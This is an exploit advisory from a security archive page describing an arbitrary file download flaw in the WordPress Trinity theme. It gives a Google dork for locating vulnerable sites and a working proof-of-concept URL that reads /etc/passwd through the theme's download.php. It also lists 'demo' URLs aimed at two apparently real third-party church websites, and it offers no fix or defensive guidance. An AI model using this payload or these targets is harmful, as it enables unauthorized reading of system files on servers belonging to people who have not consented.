WordPress Trinity Theme Arbitrary File Download

WordPress Trinity Theme Arbitrary File Download: Posted Sep 9, 2014; Authored by Mr.Doel; WordPress Trinity theme suffers from an arbitrary file download vulnerability.; tags | exploit, arbitrary; SHA-256 | 2898b961fbfdbf532d108cdb1195b27dc02b27340397a68d194636f607f4125b; Download | Favorite | View

WordPress Trinity Theme Arbitrary File Download

# Exploit Title: Wordpress Trinity theme Arbitrary File Download Vulnerability
# Date: 9/10/2014
# Google Dork : inurl:/wp-content/themes/trinity/lib
# Exploit Author: Mr.Doel
# Vendor Homepage: https://churchthemes.net/themes/trinity/
# Tested on: Windows 7 

POC :

http://localhost/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd

Demo :

www.firstbco.net/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd

http://laurelchurch.webfactional.com/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd

=====================
Greetz :

Malang Cyber Crew - Indonesian Coder

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

WordPress Trinity Theme Arbitrary File Download

WordPress Trinity Theme Arbitrary File Download

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Trinity Theme Arbitrary File Download

Share This

WordPress Trinity Theme Arbitrary File Download

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems